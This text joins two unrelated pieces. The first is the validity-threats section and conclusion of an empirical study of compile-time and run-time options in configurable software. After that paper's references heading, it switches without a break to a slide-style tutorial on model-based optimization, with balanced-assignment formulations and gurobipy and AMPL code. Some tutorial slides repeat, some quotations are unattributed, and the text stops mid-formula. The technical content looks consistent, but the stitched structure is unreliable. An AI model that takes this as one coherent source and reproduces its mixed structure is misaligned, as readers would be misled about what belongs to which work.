#### 7 THREATS

**Construct validity.** While constructing the experimental protocol and measuring the performance of software systems, we only kept a subset of all their compile-time and run-time options. The study we conducted focused on performance measurements. The risk was to select options that have no impact on performance, making the results irrelevant. We therefore based our selection on options whose documentation indicates a potential impact on performance. The relevance of the input data provided to software systems during the experiment is crucial.
To mitigate this threat we rely on: performance tests (and the input data they use) developed and used by nodeJS; widely-used input data sets (xz and x264); a large and heterogeneous data set of PDF files (poppler).

**Internal validity.** Measuring non-functional properties is a complex process. During this process, the dependencies of the operating system can interact with the software system. For instance, the version of gcc could alter the way the source code is compiled and change our conclusions. To mitigate this threat, we provided one Docker container and fixed the configuration of the operating system for each subject system. However, due to the measurement cost, we did not repeat each measurement several times. To gather measurements, we used the same dedicated server for the different subject systems; thus, we can guarantee it was the only process running. The performance of the software systems can depend on the hardware they are executed on. To mitigate this threat we used the same hardware and provide its specifications for comparison during replications. Another threat to validity is related to performance measured per second (e.g., the number of fps for x264). For fast run-time executions, tiny variations in time can induce large variations of the per-second ratio. To alleviate this threat, we made sure the average execution time always stays greater than one second for all inputs. To learn a performance model and predict which configuration was optimal, we used a machine learning algorithm in RQ2.2, namely Random Forest. Such algorithms can produce unstable results from one run to the next, which could be a problem for the results related to this research question. In order to mitigate this threat, we kept the average value over 10 runs.

#### 8 CONCLUSION

Is there an interplay between compile-time and run-time options when it comes to performance? Our empirical study over four configurable software systems showed that two types of systems exist.
In the most favorable case, compile-time options have a linear effect on the run-time configuration space. We have observed this phenomenon for two systems and several non-functional properties (e.g., execution time). There are then opportunities: the configuration knowledge generalizes no matter how the system is compiled; performance can be further tuned through the optimisation of compile-time options, without thinking about the run-time layer; and the selection of a custom compile-time configuration can reduce the cost of measuring run-time configurations. We have shown we can improve the run-time performance of these two systems, at compile time and at lower cost. However, our study also showed that there is a subject system for which there are interactions between run-time and compile-time options. This challenging case changes the rankings of run-time configurations’ performances as well as the performance distributions. We have shown we can overcome this problem with a simple performance model that uses these interactions to outperform the default compile-time configuration. The fourth subject of our study is in between: the compile-time layer strongly interacts with run-time options only when processing one specific input. For the 9 other inputs of our experiment, we can take advantage of the linear interplay. Hence, it is possible but rare that there is an interplay between compile-time options, run-time options, and the inputs fed to a system. Our work calls for further investigation of how variability layers interact. We encourage researchers to replicate our study for different subject systems and application domains.

**Acknowledgments.** This research was funded by the ANR-17-CE25-0010-01 VaryVary project.

REFERENCES
Model-Based Optimization: Principles and Trends

Robert Fourer
AMPL Optimization Inc.
4er@ampl.com

24th International Conference on Principles and Practice of Constraint Programming — Lille, France
Tutorial 1, 28 August 2018, 14:00-15:00

Model-Based Optimization: Principles and Trends

As optimization methods have been applied more broadly and effectively, a key factor in their success has been the adoption of a model-based approach. A researcher or analyst focuses on modeling the problem of interest, while the computation of a solution is left to general-purpose, off-the-shelf solvers; independent modeling languages and systems manage the difficulties of translating between the human modeler’s ideas and the computer software’s needs. This tutorial introduces model-based optimization with examples from the AMPL modeling language and various popular solvers; the presentation concludes by surveying current software, with special attention to the role of constraint programming.

Outline

Approaches to optimization
❖ Model-based vs. Method-based

Modeling languages for model-based optimization
❖ Motivation for modeling languages
❖ Algebraic modeling languages
❖ Executable vs. declarative languages
❖ Survey of modeling language software

Solvers for model-based optimization
❖ Linear
❖ Nonlinear
❖ Global
❖ Constraint

Examples

**Approaches to optimization**
- Model-based vs. Method-based
- Example: Balanced assignment

**Modeling languages for model-based optimization**
- Executable vs. declarative languages
- Example: gurobipy vs.
AMPL
- Survey of modeling language software
- Example: Balanced assignment in AMPL
- Example: Nonlinear optimization in AMPL

**Solvers for model-based optimization**
- Constraint
- Example: Balanced assignment via CP in AMPL

Example: Balanced Assignment

Motivation
- meeting of employees from around the world

Given
- several employee categories (title, location, department, male/female)
- a specified number of project groups

Assign
- each employee to a project group

So that
- the groups have about the same size
- the groups are as “diverse” as possible with respect to all categories

**Method-Based Approach**

**Define an algorithm to build a balanced assignment**
- Start with all groups empty
- Make a list of people (employees)
- For each person in the list:
  - Add to the group whose resulting “sameness” will be least

```plaintext
Initialize all groups G = { }
Repeat for each person p
    sMin = Infinity
    Repeat for each group G
        s = total "sameness" in G ∪ {p}
        if s < sMin then
            sMin = s
            GMin = G
    Assign person p to group GMin
```

Balanced Assignment

**Method-Based Approach (cont’d)**

**Define a computable concept of “sameness”**
- Sameness of any two people:
  - Number of categories in which they are the same
- Sameness of a group:
  - Sum of the sameness of all pairs of people in the group

**Refine the algorithm to get better results**
- Reorder the list of people
- Locally improve the initial “greedy” solution by swapping group members
- Seek further improvement through local search metaheuristics
  - What are the neighbors of an assignment?
  - How can two assignments combine to create a better one?
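The greedy pseudocode above translates directly to runnable Python. This sketch is illustrative only: the names and data are ours, and group-size limits are ignored, as in the slide.

```python
# Greedy balanced assignment: each person joins the group whose total
# "sameness" increases least. Sameness of two people = number of
# categories in which they share a type, as defined on the slides.

def sameness(p1, p2):
    """Number of categories in which two people have the same type."""
    return sum(1 for k in p1 if p1[k] == p2[k])

def greedy_assign(people, n_groups):
    """people: list of {category: type} dicts; returns a list of groups."""
    groups = [[] for _ in range(n_groups)]
    for person in people:
        # added sameness = sum of sameness with the group's current members
        cost = lambda g: sum(sameness(person, member) for member in g)
        min(groups, key=cost).append(person)
    return groups

# Tiny invented roster with two categories.
people = [
    {"loc": "US", "dept": "R&D"},
    {"loc": "US", "dept": "Sales"},
    {"loc": "FR", "dept": "R&D"},
    {"loc": "FR", "dept": "Sales"},
]
groups = greedy_assign(people, 2)
```

As the slides note, this greedy pass is only a starting point; reordering the list and local swap improvements refine the result.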
Balanced Assignment

Model-Based Approach

Formulate a “minimal sameness” model
- Define decision variables for assignment of people to groups
  - \( x_{ij} = 1 \) if person \( i \) is assigned to group \( j \)
  - \( x_{ij} = 0 \) otherwise
- Specify valid assignments through constraints on the variables
- Formulate sameness as an objective to be minimized
  - Total sameness = sum of the sameness of all groups

Send to an off-the-shelf solver
- Choice of excellent linear-quadratic mixed-integer solvers
- Zero-one optimization is a special case

Given
\[ P \quad \text{set of people} \]
\[ C \quad \text{set of categories of people} \]
\[ t_{ik} \quad \text{type of person } i \text{ within category } k, \text{ for all } i \in P, k \in C \]
and
\[ G \quad \text{number of groups} \]
\[ g_{\text{min}} \quad \text{lower limit on people in a group} \]
\[ g_{\text{max}} \quad \text{upper limit on people in a group} \]
Define
\[ s_{i_1 i_2} = |\{k \in C: t_{i_1 k} = t_{i_2 k}\}|, \text{ for all } i_1 \in P, i_2 \in P \]
the sameness of persons \( i_1 \) and \( i_2 \)

Model-Based Formulation (cont’d)

**Determine**
\[ x_{ij} \in \{0,1\} = 1 \text{ if person } i \text{ is assigned to group } j \]
\[ = 0 \text{ otherwise, for all } i \in P, j = 1, \ldots, G \]

**To minimize**
\[ \sum_{i_1 \in P} \sum_{i_2 \in P} s_{i_1 i_2} \sum_{j=1}^{G} x_{i_1 j} x_{i_2 j} \]
*total sameness of all pairs of people in all groups*

**Subject to**
\[ \sum_{j=1}^{G} x_{ij} = 1, \text{ for each } i \in P \]
*each person must be assigned to one group*
\[ g_{\text{min}} \leq \sum_{i \in P} x_{ij} \leq g_{\text{max}}, \text{ for each } j = 1, \ldots, G \]
*each group must be assigned an acceptable number of people*

Model-Based Solution

Optimize with an off-the-shelf solver; choose among many alternatives
- Linearize and send to a mixed-integer linear solver
  * CPLEX, Gurobi, Xpress; CBC, MIPCL, SCIP
- Send quadratic formulation to a mixed-integer solver that automatically linearizes products involving binary variables
  * CPLEX,
Gurobi, Xpress
- Send quadratic formulation to a nonlinear solver
  * Mixed-integer nonlinear: Knitro, BARON
  * Continuous nonlinear (might come out integer): MINOS, Ipopt, ...

Where Is the Work?

Method-based
- Programming an implementation of the method

Model-based
- Constructing a formulation of the model

Complications in Balanced Assignment

“Total Sameness” is problematical
❖ Hard for client to relate to goal of diversity
❖ Minimize “total variation” instead
  ∗ Sum over all types: most minus least assigned to any group

Client has special requirements
❖ No employee should be “isolated” within their group
  ∗ No group can have exactly one woman
  ∗ Every person must have a group-mate from the same location and of equal or adjacent rank

Room capacities are variable
❖ Different groups have different size limits
❖ Minimize “total deviation”
  ∗ Sum over all types: greatest violation of target range for any group

Method-Based (cont’d)

**Revise or replace the solution approach**
- Total variation is less suitable to a greedy algorithm
- Total variation is harder to locally improve
- Client constraints are challenging to enforce

**Update or re-implement the method**
- Even small changes to the problem can necessitate major changes to the method and its implementation

Balanced Assignment

**Model-Based (cont’d)**

Replace the objective
Formulate additional constraints
Send back to the solver

Balanced Assignment

Model-Based (cont’d)

To write the new objective, add variables
\[ y_{kl}^{\min} \] fewest people of category \( k \), type \( l \) in any group,
\[ y_{kl}^{\max} \] most people of category \( k \), type \( l \) in any group,
for each \( k \in C, l \in T_k = \bigcup_{i \in P} \{t_{ik}\} \)
Add defining constraints
\[ y_{kl}^{\min} \leq \sum_{i \in P : t_{ik} = l} x_{ij}, \text{ for each } j = 1, \ldots, G; \ k \in C, l \in T_k \]
\[ y_{kl}^{\max} \geq \sum_{i \in P : t_{ik} = l} x_{ij}, \text{ for each } j = 1, \ldots, G; \ k \in C, l \in T_k \]
Minimize total variation
\[ \sum_{k
\in C} \sum_{l \in T_k} (y_{kl}^{\max} - y_{kl}^{\min}) \]

Balanced Assignment

Model-Based (cont’d)

To express the client requirement for women in a group, let
\[ Q = \{ i \in P : t_{i,m/f} = \text{female} \} \]
Add constraints
\[ \sum_{i \in Q} x_{ij} = 0 \text{ or } \sum_{i \in Q} x_{ij} \geq 2, \text{ for each } j = 1, \ldots, G \]

Balanced Assignment

Model-Based (cont’d)

To express the client requirement for women in a group, let
\[ Q = \{ i \in P : t_{i,m/f} = \text{female} \} \]
Define logic variables
\[ z_j \in \{0,1\} = 1 \text{ if any women assigned to group } j \]
\[ = 0 \text{ otherwise, for all } j = 1, \ldots, G \]
Add constraints relating logic variables to assignment variables
\[ z_j = 0 \Rightarrow \sum_{i \in Q} x_{ij} = 0, \]
\[ z_j = 1 \Rightarrow \sum_{i \in Q} x_{ij} \geq 2, \text{ for each } j = 1, \ldots, G \]

Model-Based (cont’d)

To express the client requirement for women in a group, let
\[ Q = \{ i \in P : t_{i,m/f} = \text{female} \} \]
Define logic variables
\[ z_j \in \{0,1\} = 1 \text{ if any women assigned to group } j \]
\[ = 0 \text{ otherwise, for all } j = 1, \ldots, G \]
Linearize constraints relating logic variables to assignment variables
\[ 2z_j \leq \sum_{i \in Q} x_{ij} \leq |Q| z_j, \text{ for each } j = 1, \ldots, G \]

Balanced Assignment

Model-Based (cont’d)

To express the client requirements for group-mates, let
\[ R_{l_1 l_2} = \{ i \in P : t_{i,\text{loc}} = l_1, t_{i,\text{rank}} = l_2 \}, \text{ for all } l_1 \in T_{\text{loc}}, l_2 \in T_{\text{rank}} \]
\[ A_l \subseteq T_{\text{rank}}, \text{ the set of ranks adjacent to rank } l, \text{ for all } l \in T_{\text{rank}} \]
Add constraints
\[ \sum_{i \in R_{l_1 l_2}} x_{ij} = 0 \text{ or } \sum_{i \in R_{l_1 l_2}} x_{ij} + \sum_{l \in A_{l_2}} \sum_{i \in R_{l_1 l}} x_{ij} \geq 2, \]
for each \( l_1 \in T_{\text{loc}}, l_2 \in T_{\text{rank}}, j = 1, \ldots, G \)

Balanced Assignment

Model-Based (cont’d)

To express the client requirements for group-mates, let
\[ R_{l_1 l_2} = \{ i \in P : t_{i,\text{loc}} = l_1, t_{i,\text{rank}} = l_2 \}, \text{ for all } l_1 \in T_{\text{loc}}, l_2 \in T_{\text{rank}} \]
\[ A_l \subseteq T_{\text{rank}}, \text{ the set of ranks adjacent to rank } l, \text{ for all } l \in T_{\text{rank}} \]
Define logic variables
\[ w_{l_1 l_2 j} \in \{0,1\} = 1 \text{ if group } j \text{ has anyone from location } l_1 \text{ of rank } l_2 \]
\[ = 0 \text{ otherwise, for all } l_1 \in T_{\text{loc}}, l_2 \in T_{\text{rank}}, j = 1, \ldots, G \]
Add constraints relating logic variables to assignment variables
\[ w_{l_1 l_2 j} = 0 \Rightarrow \sum_{i \in R_{l_1 l_2}} x_{ij} = 0, \]
\[ w_{l_1 l_2 j} = 1 \Rightarrow \sum_{i \in R_{l_1 l_2}} x_{ij} + \sum_{l \in A_{l_2}} \sum_{i \in R_{l_1 l}} x_{ij} \geq 2, \]
for each \( l_1 \in T_{\text{loc}}, l_2 \in T_{\text{rank}}, j = 1, \ldots, G \)

Balanced Assignment

Model-Based (cont’d)

To express the client requirements for group-mates, let
\[ R_{l_1 l_2} = \{ i \in P : t_{i,\text{loc}} = l_1, t_{i,\text{rank}} = l_2 \}, \text{ for all } l_1 \in T_{\text{loc}}, l_2 \in T_{\text{rank}} \]
\[ A_l \subseteq T_{\text{rank}}, \text{ the set of ranks adjacent to rank } l, \text{ for all } l \in T_{\text{rank}} \]
Define logic variables
\[ w_{l_1 l_2 j} \in \{0,1\} = 1 \text{ if group } j \text{ has anyone from location } l_1 \text{ of rank } l_2 \]
\[ = 0 \text{ otherwise, for all } l_1 \in T_{\text{loc}}, l_2 \in T_{\text{rank}}, j = 1, \ldots, G \]
Linearize constraints relating logic variables to assignment variables
\[ w_{l_1 l_2 j} \leq \sum_{i \in R_{l_1 l_2}} x_{ij} \leq |R_{l_1 l_2}| w_{l_1 l_2 j}, \]
\[ \sum_{i \in R_{l_1 l_2}} x_{ij} + \sum_{l \in A_{l_2}} \sum_{i \in R_{l_1 l}} x_{ij} \geq 2 w_{l_1 l_2 j}, \]
for each \( l_1 \in T_{\text{loc}}, l_2 \in T_{\text{rank}}, j = 1, \ldots, G \)

Method-Based Remains Popular for . . .

**Heuristic approaches**
- Simple heuristics
  - Greedy algorithms, local improvement methods
- Metaheuristics
  - Evolutionary methods, simulated annealing, tabu search, GRASP, . . .
**Situations hard to formulate mathematically**
- Difficult combinatorial constraints
- Black-box objectives and constraints

**Large-scale, intensive applications**
- Routing fleets of delivery trucks
- Finding shortest routes in mapping apps
- Deep learning for facial recognition

Model-Based Has Become Common in . . .

**Diverse industries**
- Manufacturing, distribution, supply-chain management
- Air and rail operations, trucking, delivery services
- Medicine, medical services
- Refining, electric power flow, gas pipelines, hydropower
- Finance, e-commerce, . . .

**Diverse fields**
- Operations research & management science
- Business analytics
- Engineering & science
- Economics & finance

Model-Based Has Become Standard for . . .

Diverse industries
Diverse fields
Diverse kinds of users
- Anyone who took an “optimization” class
- Anyone else with a technical background
- Newcomers to optimization

These have in common . . .
- Good algebraic formulations for off-the-shelf solvers
- Users focused on modeling

Trends Favor Model-Based Optimization

*Model-based approaches have spread*
- Model-based metaheuristics (“Matheuristics”)
- Solvers for SAT, planning, *constraint programming*

*Off-the-shelf optimization solvers have kept improving*
- Solve the same problems faster and faster
- Handle broader problem classes
- Recognize special cases automatically

*Optimization models have become easier to embed within broader methods*
- Solver callbacks
- Model-based evolution of solver APIs
- APIs for optimization modeling systems

Modeling Languages for Model-Based Optimization

Background
- The modeling lifecycle
- Matrix generators
- Modeling languages

Algebraic modeling languages
- Design approaches: declarative, executable
- Example: AMPL vs. gurobipy
- Survey of available software

Balanced assignment model in AMPL
- Formulation
- Solution

The Optimization Modeling Lifecycle
1. Communicate with Client
2. Build Model
3. Prepare Data
4. Generate Optimization Problem
5.
Submit Problem to Solver
6. Report & Analyze Results

Managing the Modeling Lifecycle

Goals for optimization software
- Repeat the cycle quickly and reliably
- Get results before client loses interest
- Deploy for application

Complication: two forms of an optimization problem
- Modeler’s form
  - Mathematical description, easy for people to work with
- Solver’s form
  - Explicit data structure, easy for solvers to compute with

Challenge: translate between these two forms

Matrix Generators

Write a program to generate the solver’s form
- Read data and compute objective & constraint coefficients
- Communicate with the solver via its API
- Convert the solver’s solution for viewing or processing

Some attractions
- Ease of embedding into larger systems
- Access to advanced solver features

Serious disadvantages
- Difficult environment for modeling
  * program does not resemble the modeler’s form
  * model is not separate from data
- Very slow modeling cycle
  * hard to check the program for correctness
  * hard to distinguish modeling from programming errors

Over the past seven years we have perceived that the size distribution of general structure LP problems being run on commercial LP codes has remained about stable. A 3000 constraint LP model is still considered large and very few LP problems larger than 6000 rows are being solved on a production basis. That this distribution has not noticeably changed despite a massive change in solution economics is unexpected. We do not feel that the linear programming user’s most pressing need over the next few years is for a new optimizer that runs twice as fast on a machine that costs half as much (although this will probably happen). Cost of optimization is just not the dominant barrier to LP model implementation. The process required to manage the data, formulate and build the model, report on and analyze the results costs far more, and is much more of a barrier to effective use of LP, than the cost/performance of the optimizer.
Why aren’t more larger models being run? It is not because they could not be useful; it is because we are not successful in using them. They become unmanageable. LP technology has reached the point where anything that can be formulated and understood can be optimized at a relatively modest cost.

Modeling Languages

*Describe your model*
- Write your symbolic model in a *computer-readable modeler’s form*
- Prepare data for the model
- Let computer translate to & from the solver’s form

*Limited drawbacks*
- Need to learn a new language
- Incur overhead in translation
- Make formulations clearer and hence easier to steal?

*Great advantages*
- Faster modeling cycles
- More reliable modeling
- More maintainable applications

The aim of this system is to provide one representation of a model which is easily understood by both humans and machines. With such a notation, the information content of the model representation is such that a machine can not only check for algebraic correctness and completeness, but also interface automatically with solution algorithms and report writers. ... a significant portion of total resources in a modeling exercise ... is spent on the generation, manipulation and reporting of models. It is evident that this must be reduced greatly if models are to become effective tools in planning and decision making. The heart of it all is the fact that solution algorithms need a data structure which, for all practical purposes, is impossible to comprehend by humans, while, at the same time, meaningful problem representations for humans are not acceptable to machines. We feel that the two translation processes required (to and from the machine) can be identified as the main source of difficulties and errors. GAMS is a system that is designed to eliminate these two translation processes, thereby lifting a technical barrier to effective modeling ...
These two forms of a linear program — the modeler’s form and the algorithm’s form — are not much alike, and yet neither can be done without. Thus any application of linear optimization involves translating the one form to the other. This process of translation has long been recognized as a difficult and expensive task of practical linear programming. In the traditional approach to translation, the work is divided between modeler and machine. . . . There is also a quite different approach to translation, in which as much work as possible is left to the machine. The central feature of this alternative approach is a modeling language that is written by the modeler and translated by the computer. A modeling language is not a programming language; rather, it is a declarative language that expresses the modeler’s form of a linear program in a notation that a computer system can interpret. Algebraic Modeling Languages Designed for a model-based approach - Define data in terms of sets & parameters - Analogous to database keys & records - Define decision variables - Minimize or maximize an algebraic function of decision variables - Subject to algebraic equations or inequalities that constrain the values of the variables Advantages - Familiar - Powerful - Proven Overview Design alternatives - **Executable**: object libraries for programming languages - **Declarative**: specialized optimization languages Design comparison - Executable versus declarative using one simple example Survey - Solver-independent vs. solver-specific - Proprietary vs. 
free - Notable specific features Executable Concept - Create an algebraic modeling language inside a general-purpose programming language - Redefine operators like + and <= to return constraint objects rather than simple values Advantages - Ready integration with applications - Good access to advanced solver features Disadvantages - Programming issues complicate description of the model - Modeling and programming bugs are hard to separate - Efficiency issues are more of a concern Algebraic Modeling Languages Declarative Concept - Design a language specifically for optimization modeling - Resembles mathematical notation as much as possible - Extend to command scripts and database links - Connect to external applications via APIs Disadvantages - Adds a system between application and solver - Does not have a full object-oriented programming framework Advantages - Streamlines model development - Promotes validation and maintenance of models - Can provide APIs for many popular programming languages Comparison: Executable vs. 
Declarative

Two representative widely used systems
- Executable: *gurobipy*
  - Python modeling interface for the Gurobi solver
  - http://gurobi.com
- Declarative: *AMPL*
  - Specialized modeling language with multi-solver support
  - http://ampl.com

Comparison

Data

gurobipy
- Assign values to Python lists and dictionaries

```python
commodities = ['Pencils', 'Pens']
nodes = ['Detroit', 'Denver', 'Boston', 'New York', 'Seattle']

arcs, capacity = multidict({
    ('Detroit', 'Boston'):   100,
    ('Detroit', 'New York'):  80,
    ('Detroit', 'Seattle'):  120,
    ('Denver',  'Boston'):   120,
    ('Denver',  'New York'): 120,
    ('Denver',  'Seattle'):  120 })
```

AMPL
- Define symbolic model sets and parameters
- Provide data later in a separate file

```ampl
set COMMODITIES;
set NODES;
set ARCS within {NODES,NODES};
param capacity {ARCS} >= 0;

set COMMODITIES := Pencils Pens ;
set NODES := Detroit Denver Boston 'New York' Seattle ;
param: ARCS: capacity:
          Boston 'New York' Seattle :=
Detroit     100       80       120
Denver      120      120       120 ;
```

Comparison

Data (cont'd)

gurobipy

```python
inflow = {
    ('Pencils', 'Detroit'):   50,
    ('Pencils', 'Denver'):    60,
    ('Pencils', 'Boston'):   -50,
    ('Pencils', 'New York'): -50,
    ('Pencils', 'Seattle'):  -10,
    ('Pens',    'Detroit'):   60,
    ('Pens',    'Denver'):    40,
    ('Pens',    'Boston'):   -40,
    ('Pens',    'New York'): -30,
    ('Pens',    'Seattle'):  -30 }
```

AMPL

```ampl
param inflow {COMMODITIES,NODES};

param inflow (tr):  Pencils  Pens :=
    Detroit             50     60
    Denver              60     40
    Boston             -50    -40
    'New York'         -50    -30
    Seattle            -10    -30 ;
```

Comparison

Data (cont'd)

gurobipy

```python
cost = {
    ('Pencils', 'Detroit', 'Boston'):   10,
    ('Pencils', 'Detroit', 'New York'): 20,
    ('Pencils', 'Detroit', 'Seattle'):  60,
    ('Pencils', 'Denver',  'Boston'):   40,
    ('Pencils', 'Denver',  'New York'): 40,
    ('Pencils', 'Denver',  'Seattle'):  30,
    ('Pens',    'Detroit', 'Boston'):   20,
    ('Pens',    'Detroit', 'New York'): 20,
    ('Pens',    'Detroit', 'Seattle'):  80,
    ('Pens',    'Denver',  'Boston'):   60,
    ('Pens',    'Denver',  'New York'): 70,
    ('Pens',    'Denver',  'Seattle'):  30 }
```

Comparison

Data (cont'd)
AMPL

```ampl
param cost {COMMODITIES,ARCS} >= 0;

param cost :=
 [Pencils,*,*] (tr):  Detroit  Denver :=
    Boston                10      40
    'New York'            20      40
    Seattle               60      30

 [Pens,*,*] (tr):     Detroit  Denver :=
    Boston                20      60
    'New York'            20      70
    Seattle               80      30 ;
```

Comparison

Model

gurobipy

```python
m = Model('netflow')

flow = m.addVars(commodities, arcs, obj=cost, name="flow")

m.addConstrs(
    (flow.sum('*',i,j) <= capacity[i,j] for i,j in arcs), "cap")

m.addConstrs(
    (flow.sum(h,'*',j) + inflow[h,j] == flow.sum(h,j,'*')
        for h in commodities for j in nodes), "node")
```

```python
for i,j in arcs:
    m.addConstr(
        sum(flow[h,i,j] for h in commodities) <= capacity[i,j],
        "cap[%s,%s]" % (i,j))

m.addConstrs(
    (quicksum(flow[h,i,j] for i,j in arcs.select('*',j)) + inflow[h,j] ==
     quicksum(flow[h,j,k] for j,k in arcs.select(j,'*'))
        for h in commodities for j in nodes), "node")
```

Comparison

(Note on Summations)

gurobipy quicksum

```python
m.addConstrs(
    (quicksum(flow[h,i,j] for i,j in arcs.select('*',j)) + inflow[h,j] ==
     quicksum(flow[h,j,k] for j,k in arcs.select(j,'*'))
        for h in commodities for j in nodes), "node")
```

**quicksum**( data )

A version of the Python sum function that is much more efficient for building large Gurobi expressions (LinExpr or QuadExpr objects). The function takes a list of terms as its argument.

Note that while quicksum is much faster than sum, it isn't the fastest approach for building a large expression. Use addTerms or the LinExpr() constructor if you want the quickest possible expression construction.
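The efficiency warning in the quicksum documentation is not specific to Gurobi. Any executable modeling layer that overloads `+` to return a fresh expression object makes Python's built-in `sum` quadratic in the number of terms, because each `+` copies every term accumulated so far. A toy `LinExpr` class (hypothetical — not Gurobi's actual implementation) makes the difference visible:

```python
# Toy linear-expression class illustrating why operator-overloading
# modeling layers provide a quicksum-style helper. Not Gurobi code.

class LinExpr:
    def __init__(self, terms=()):
        self.terms = list(terms)      # list of (coeff, varname) pairs

    def __add__(self, other):
        # Returns a NEW object, copying all terms gathered so far.
        return LinExpr(self.terms + other.terms)

    def add_terms(self, terms):
        # In-place append: no copying of existing terms.
        self.terms.extend(terms)
        return self

def slow_sum(exprs):
    # Like built-in sum(): each + copies the accumulator, O(n^2) total.
    total = LinExpr()
    for e in exprs:
        total = total + e
    return total

def quick_sum(exprs):
    # Like quicksum(): appends in place, O(n) total.
    total = LinExpr()
    for e in exprs:
        total.add_terms(e.terms)
    return total

exprs = [LinExpr([(1.0, "x%d" % k)]) for k in range(1000)]
assert slow_sum(exprs).terms == quick_sum(exprs).terms
```

Both versions build the same expression; timing them on larger term counts shows the copying version growing roughly quadratically while the appending version stays linear.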
Comparison Model (cont’d) AMPL ``` var Flow {COMMODITIES, ARCS} >= 0; minimize TotalCost: sum {h in COMMODITIES, (i,j) in ARCS} cost[h,i,j] * Flow[h,i,j]; subject to Capacity {(i,j) in ARCS}: sum {h in COMMODITIES} Flow[h,i,j] <= capacity[i,j]; subject to Conservation {h in COMMODITIES, j in NODES}: sum {(i,j) in ARCS} Flow[h,i,j] + inflow[h,j] = sum {(j,i) in ARCS} Flow[h,j,i]; ``` **Comparison** **Solution** ```python m.optimize() if m.status == GRB.Status.OPTIMAL: solution = m.getAttr('x', flow) for h in commodities: print('\nOptimal flows for %s:' % h) for i, j in arcs: if solution[h, i, j] > 0: print('%s -> %s: %g' % (i, j, solution[h, i, j])) ``` Comparison Solution (cont’d) AMPL ```ampl AMPL: solve; Gurobi 8.0.0: optimal solution; objective 5500 2 simplex iterations AMPL: display Flow; Flow [Pencils,*,*] : Boston 'New York' Seattle := Denver 0 50 10 Detroit 50 0 0 [Pens,*,*] : Boston 'New York' Seattle := Denver 10 0 30 Detroit 30 30 0 ``` ; Comparison Integration with Solvers gurobipy - Works closely with the Gurobi solver: callbacks during optimization, fast re-solves after problem changes - Offers convenient extended expressions: min/max, and/or, if-then-else AMPL - Supports all popular solvers - Extends to general nonlinear and logic expressions - Connects to nonlinear function libraries and user-defined functions - Automatically computes nonlinear function derivatives Comparison Integration with Applications gurobipy - Everything can be developed in Python - Extensive data, visualization, deployment tools available - Limited modeling features also in C++, C#, Java AMPL - Modeling language extended with loops, tests, assignments - Application programming interfaces (APIs) for calling AMPL from C++, C#, Java, MATLAB, Python, R - Efficient methods for data interchange - Add-ons for streamlined deployment - QuanDec by Cassotis - Opalytics Cloud Platform Algebraic Modeling Languages Software Survey Solver-specific - Associated with popular commercial solvers 
- Executable and declarative alternatives Solver-independent - Support multiple solvers and solver types - Mostly commercial/declarative and free/executable Survey Solver-Specific Declarative, commercial - OPL for CPLEX (IBM) - MOSEL* for Xpress (FICO) - OPTMODEL for SAS/OR (SAS) Executable, commercial - Concert Technology C++ for CPLEX - gurobipy for Gurobi - sasoptpy for SAS Optimization Survey Solver-Independent Declarative, commercial - AIMMS - AMPL - GAMS - MPL Declarative, free - CMPL - GMPL / MathProg Executable, free - PuLP; Pyomo / Python - YALMIP; CVX / MATLAB - JuMP / Julia - FLOPC++ / C++ Algebraic Modeling Languages Trends Commercial, declarative modeling systems - Established lineup of solver-independent modeling systems that represent decades of development and support - Extended with scripting, APIs, data tools to promote integration with broader applications Commercial, executable modeling systems - Increasingly essential to commercial solver offerings - Becoming the recommended APIs for solvers Free, executable modeling systems - A major current focus of free optimization software development - Interesting new executable modeling languages have become easier to develop than interesting new solvers Notable cases not detailed earlier . . . 
- **AIMMS (solver-independent, commercial, declarative)** has extensive application development tools built in - **CMPL (solver-independent, free, declarative)** has an IDE, Python and Java APIs, and remote server support - **GMPL/MathProg (solver-independent, free, declarative)** is a free implementation of mainly a subset of AMPL - **JuMP (solver-independent, free, executable)** claims greater efficiency through use of a new programming language, Julia - **MOSEL for Xpress (solver-specific, commercial)** a hybrid of declarative and executable, has recently been made free and may accept other solvers Balanced Assignment Revisited Given - $P$ set of people - $C$ set of categories of people - $t_{ik}$ type of person $i$ within category $k$, for all $i \in P, k \in C$ and - $G$ number of groups - $g_{\text{min}}$ lower limit on people in a group - $g_{\text{max}}$ upper limit on people in a group Define - $T_k = \bigcup_{i \in P} \{t_{ik}\}$, for all $k \in C$ - set of all types of people in category $k$ Balanced Assignment Revisited in AMPL Sets, parameters set PEOPLE; # individuals to be assigned set CATEG; param type {PEOPLE,CATEG} symbolic; # categories by which people are classified; # type of each person in each category param numberGrps integer > 0; param minInGrp integer > 0; param maxInGrp integer >= minInGrp; # number of groups; bounds on size of groups set TYPES {k in CATEG} = setof {i in PEOPLE} type[i,k]; # all types found in each category Balanced Assignment Determine \[ x_{ij} \in \{0,1\} = 1 \text{ if person } i \text{ is assigned to group } j \] \[ = 0 \text{ otherwise, for all } i \in P, j = 1, \ldots, G \] \[ y_{kl}^{\min} \] fewest people of category \( k \), type \( l \) in any group, \[ y_{kl}^{\max} \] most people of category \( k \), type \( l \) in any group, for each \( k \in C, l \in T_k \) Where \[ y_{kl}^{\min} \leq \sum_{i \in P : t_{ik} = l} x_{ij}, \text{ for each } j = 1, \ldots, G; \ k \in C, l \in T_k \] \[ y_{kl}^{\max} \geq 
\sum_{i \in P : t_{ik} = l} x_{ij}, \text{ for each } j = 1, \ldots, G; \ k \in C, l \in T_k \] Balanced Assignment *in AMPL* **Variables, defining constraints** ```AMPL var Assign {i in PEOPLE, j in 1..numberGrps} binary; # Assign[i,j] is 1 if and only if # person i is assigned to group j var MinType {k in CATEG, TYPES[k]}; var MaxType {k in CATEG, TYPES[k]}; # fewest and most people of each type, over all groups subj to MinTypeDefn {j in 1..numberGrps, k in CATEG, l in TYPES[k]}: MinType[k,l] <= sum {i in PEOPLE: type[i,k] = l} Assign[i,j]; subj to MaxTypeDefn {j in 1..numberGrps, k in CATEG, l in TYPES[k]}: MaxType[k,l] >= sum {i in PEOPLE: type[i,k] = l} Assign[i,j]; # values of MinTypeDefn and MaxTypeDefn variables # must be consistent with values of Assign variables \[ y_{kl}^{\text{max}} \geq \sum_{i \in P: t_{ik} = l} x_{ij}, \text{ for each } j = 1, \ldots, G; \ k \in C, \ l \in T_k \] ``` Balanced Assignment Minimize \[ \sum_{k \in C} \sum_{l \in T_k} (y_{kl}^{\text{max}} - y_{kl}^{\text{min}}) \] sum of inter-group variation over all types in all categories Subject to \[ \sum_{j=1}^{G} x_{ij} = 1, \text{ for each } i \in P \] each person must be assigned to one group \[ g^{\text{min}} \leq \sum_{i \in P} x_{ij} \leq g^{\text{max}}, \text{ for each } j = 